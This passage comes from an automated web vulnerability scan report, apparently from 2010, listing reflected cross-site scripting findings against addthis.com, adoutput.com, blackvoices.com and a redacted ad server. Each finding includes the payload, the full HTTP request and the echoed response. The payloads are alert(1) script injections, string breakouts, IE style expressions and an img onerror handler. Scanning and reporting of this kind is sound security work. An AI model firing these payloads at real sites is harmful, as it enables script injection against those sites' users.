Confidence:   Firm
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4353325

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f425'%3b82df02f9b00 was submitted in the REST URL parameter 4. This input was echoed as 7f425';82df02f9b00 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8GF/iview/273499083/direct7f425'%3b82df02f9b00/01/4353325 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1286756359-11647780; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; MUID=484C17C84DEE440386469B4B8F7D0E08;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6265
Content-Type: text/html
Expires: 0
X-Powered-By: ASP.NET
Date: Fri, 26 Nov 2010 20:33:22 GMT
Connection: close

<html><head><title>BW_728x90_IR_40k_V1</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/8G8GFWIREBUW/9_1_updated_Glomo_IR/BW_728x90_IR_40k_V1.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/273499083/direct7f425';82df02f9b00;ai.180920921;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/273499083/direct7f425';82df02f9b00;ai.180920921;ct.1/01" />
...[SNIP]...

1.135. http://redcated/8GF/iview/273499083/direct/01/4367731 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /8GF/iview/273499083/direct/01/4367731

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f7b7'%3b91d72ce6d9c was submitted in the REST URL parameter 4. This input was echoed as 4f7b7';91d72ce6d9c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /8GF/iview/273499083/direct4f7b7'%3b91d72ce6d9c/01/4367731 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1286756359-11647780; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e; MUID=484C17C84DEE440386469B4B8F7D0E08;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6282
Content-Type: text/html
Expires: 0
X-Powered-By: ASP.NET
Date: Fri, 26 Nov 2010 20:33:21 GMT
Connection: close

<html><head><title>BW_728x90_PR_TradeshowBanner</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;marg
...[SNIP]...
<param name="movie" value="HTTP://ec.atdmt.com/ds/8G8GFWIREBUW/BW_PR_Tradeshow_Banner/BW_728x90_PR_40k_V1.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/273499083/direct4f7b7';91d72ce6d9c;ai.189412363;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/273499083/direct4f7b7';91d72ce6d9c;ai.189412363;ct.1/01" />
...[SNIP]...

1.136. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 22b68<script>alert(1)</script>c7dcdbaa3f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php22b68<script>alert(1)</script>c7dcdbaa3f1 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=nfcmfl3a8bvamf2epbm2sfr8v4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php22b68<script>alert(1)</script>c7dcdbaa3f1</strong>
...[SNIP]...

1.137. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5c7a"-alert(1)-"857e19dcbea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.phpc5c7a"-alert(1)-"857e19dcbea HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=40ctjkt2h4hdgnllgcsm2qi256; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.phpc5c7a"-alert(1)-"857e19dcbea";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.138. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bca3"%20style%3dx%3aexpression(alert(1))%20509484a33de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7bca3\" style=x:expression(alert(1)) 509484a33de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250&username=ny/7bca3"%20style%3dx%3aexpression(alert(1))%20509484a33depost HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:25:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 88510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="pub" name="pub" value="ny/7bca3\" style=x:expression(alert(1)) 509484a33depost" />
...[SNIP]...

1.139. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22c18"-alert(1)-"034c58d7f3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/22c18"-alert(1)-"034c58d7f3a HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/22c18"-alert(1)-"034c58d7f3a";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.140. http://www.addthis.com/bookmark.php [username parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the username request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7a11"%20style%3dx%3aexpression(alert(1))%20f974865e7b3 was submitted in the username parameter. This input was echoed as a7a11\" style=x:expression(alert(1)) f974865e7b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250&username=nyposta7a11"%20style%3dx%3aexpression(alert(1))%20f974865e7b3 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 88502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="pub" name="pub" value="nyposta7a11\" style=x:expression(alert(1)) f974865e7b3" />
...[SNIP]...

1.141. http://www.addthis.com/bookmark.php [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the v request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 764f1"style%3d"x%3aexpression(alert(1))"83f87f85126 was submitted in the v parameter. This input was echoed as 764f1"style="x:expression(alert(1))"83f87f85126 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bookmark.php?v=250764f1"style%3d"x%3aexpression(alert(1))"83f87f85126&username=nypost HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<input type="hidden" id="source" name="source" value="bkm-250764f1"style="x:expression(alert(1))"83f87f85126" />
...[SNIP]...

1.142. http://www.addthis.com/help/api-spec [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /help/api-spec

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da9a"-alert(1)-"c69f3c78fc2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /3da9a"-alert(1)-"c69f3c78fc2/api-spec HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=9oaq5mil1k02nq110ts56omut3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1441
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/3da9a"-alert(1)-"c69f3c78fc2/api-spec";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker =
...[SNIP]...

1.143. http://www.addthis.com/help/api-spec [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /help/api-spec

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 77b50<script>alert(1)</script>696b9357f98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /77b50<script>alert(1)</script>696b9357f98/api-spec HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=ml9o7tc804oogtbe2d38amhjd7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1467
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>77b50<script>alert(1)</script>696b9357f98/api-spec</strong>
...[SNIP]...

1.144. http://www.addthis.com/help/api-spec [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /help/api-spec

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d0a3"-alert(1)-"bb1385e53e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /help/6d0a3"-alert(1)-"bb1385e53e HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 26 Nov 2010 20:24:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=89ulbati6ru761e244tt7suj63; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: mouser=sk; expires=Fri, 03-Dec-2010 20:24:48 GMT; path=/
Vary: Accept-Encoding
imagetoolbar: no
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 13400

   
   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>AddThis - He
...[SNIP]...
<script type="text/javascript">
var u = "/404/help/6d0a3"-alert(1)-"bb1385e53e";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.145. http://www.adoutput.com/version2/hit_rm.cfm [type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adoutput.com
Path:   /version2/hit_rm.cfm

Issue detail

The value of the type request parameter is copied into the HTML document as plain text between tags. The payload 8ec69<img%20src%3da%20onerror%3dalert(1)>5025a7d35c8 was submitted in the type parameter. This input was echoed as 8ec69<img src=a onerror=alert(1)>5025a7d35c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /version2/hit_rm.cfm?type=08ec69<img%20src%3da%20onerror%3dalert(1)>5025a7d35c8 HTTP/1.1
Host: www.adoutput.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Nov 2010 20:21:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value "08ec69<img src=a onerror=alert(1)>5025a7d35c8" cannot be converted to a number
</h1>
...[SNIP]...

1.146. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6b3b"-alert(1)-"dd17837dd5a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:c6b3b"-alert(1)-"dd17837dd5a/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2334838204.3408588364.1550714624; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 26 Nov 2010 20:24:41 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31028
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld30 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
<!--
s_265.mmxgo=true;
s_265.pageName="Page Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:c6b3b"-alert(1)-"dd17837dd5a";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:c6b3b\"-alert(1)-\"dd17837dd5a/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertain
...[SNIP]...

1.147. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19f54</script><script>alert(1)</script>6443d67beca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com19f54</script><script>alert(1)</script>6443d67beca/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244900364.489352780.3698329344; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 26 Nov 2010 20:24:44 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31020
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm30 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com19f54</script><script>alert(1)</script>6443d67beca/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternal
...[SNIP]...

1.148. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5521b</script><script>alert(1)</script>b0ec37dd172 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*5521b</script><script>alert(1)</script>b0ec37dd172/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3244900364.489352780.3882878720; path=/
X-RSP: 1
